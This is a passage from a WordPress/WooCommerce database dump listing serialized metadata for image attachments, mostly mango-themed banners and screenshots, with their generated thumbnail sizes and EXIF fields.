:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-768x256.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:133:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1536x512.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-600x200.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:130:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-48x16.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:130:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-48x16.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:37:\"Elizaveta Galitskaya | Dreamstime.com\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4291,1034,'_wp_attached_file','2022/03/mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1.jpg'),(4292,1034,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1207;s:6:\"height\";i:524;s:4:\"file\";s:134:\"2022/03/mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1.jpg\";s:8:\"filesize\";i:96836;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34539;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24996;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-50x22.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23516;}s:6:\"medium\";a:4:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-300x130.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:130;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:135:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-1024x445.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-768x333.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-600x260.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:134:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-48x21.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:21;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1-48x21.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:21;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1646319149\";s:9:\"copyright\";s:37:\"Elizaveta Galitskaya | Dreamstime.com\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4440,1045,'_wp_attached_file','2022/03/mangoes.jpg'),(4441,1045,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:727;s:6:\"height\";i:477;s:4:\"file\";s:19:\"2022/03/mangoes.jpg\";s:8:\"filesize\";i:181623;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"mangoes-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67078;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"mangoes-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37382;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"mangoes-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34017;}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"mangoes-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"mangoes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"mangoes-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"mangoes-600x394.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"mangoes-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"mangoes-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"mangoes-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1646318825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4442,1046,'_wp_attached_file','2022/03/Screenshot-28.png'),(4443,1046,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:788;s:6:\"height\";i:438;s:4:\"file\";s:25:\"2022/03/Screenshot-28.png\";s:8:\"filesize\";i:212287;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"Screenshot-28-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:74791;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"Screenshot-28-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13610;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"Screenshot-28-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2834;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Screenshot-28-300x167.png\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-28-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Screenshot-28-768x427.png\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Screenshot-28-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Screenshot-28-600x334.png\";s:5:\"width\";i:600;s:6:\"height\";i:334;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-28-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"Screenshot-28-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"Screenshot-28-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4444,1047,'_wp_attached_file','2022/03/Mango.gif'),(4445,1047,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:17:\"2022/03/Mango.gif\";s:8:\"filesize\";i:1717774;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"Mango-320x320.gif\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:11274;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"Mango-100x100.gif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:2404;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:15:\"Mango-50x38.gif\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:1160;}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Mango-300x225.gif\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/gif\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Mango-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"Mango-768x576.gif\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/gif\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"Mango-320x320.gif\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/gif\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"Mango-600x450.gif\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"Mango-100x100.gif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/gif\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:15:\"Mango-48x36.gif\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/gif\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:15:\"Mango-48x36.gif\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4449,1049,'_wp_attached_file','2022/03/159-1593158_free-juice-wallpapers-mango-juice.jpg'),(4450,1049,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:972;s:6:\"height\";i:500;s:4:\"file\";s:57:\"2022/03/159-1593158_free-juice-wallpapers-mango-juice.jpg\";s:8:\"filesize\";i:375387;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18083;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3304;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:55:\"159-1593158_free-juice-wallpapers-mango-juice-50x26.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:26;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1073;}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-768x395.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:395;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-600x309.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:57:\"159-1593158_free-juice-wallpapers-mango-juice-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:55:\"159-1593158_free-juice-wallpapers-mango-juice-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:55:\"159-1593158_free-juice-wallpapers-mango-juice-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4455,1051,'_wp_attached_file','2022/03/Screenshot-32.png'),(4456,1051,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1149;s:6:\"height\";i:529;s:4:\"file\";s:25:\"2022/03/Screenshot-32.png\";s:8:\"filesize\";i:1023755;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"Screenshot-32-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:209757;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"Screenshot-32-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24666;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"Screenshot-32-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2934;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Screenshot-32-300x138.png\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Screenshot-32-1024x471.png\";s:5:\"width\";i:1024;s:6:\"height\";i:471;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-32-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Screenshot-32-768x354.png\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Screenshot-32-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Screenshot-32-600x276.png\";s:5:\"width\";i:600;s:6:\"height\";i:276;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-32-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"Screenshot-32-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"Screenshot-32-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4479,1057,'_wp_attached_file','2022/03/banner-Recovered-04.png'),(4480,1057,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:31:\"2022/03/banner-Recovered-04.png\";s:8:\"filesize\";i:791045;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"banner-Recovered-04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79761;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12952;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"banner-Recovered-04-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1933;}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-04-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-04-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4487,1060,'_wp_attached_file','2022/02/cropped-bg-01.png'),(4488,1060,'_wp_attachment_context','custom-header'),(4489,1060,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:844;s:4:\"file\";s:25:\"2022/02/cropped-bg-01.png\";s:8:\"filesize\";i:383606;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"cropped-bg-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:60549;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"cropped-bg-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8496;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"cropped-bg-01-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1400;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"cropped-bg-01-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"cropped-bg-01-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"cropped-bg-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"cropped-bg-01-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"cropped-bg-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"cropped-bg-01-600x338.png\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"cropped-bg-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"cropped-bg-01-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"cropped-bg-01-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"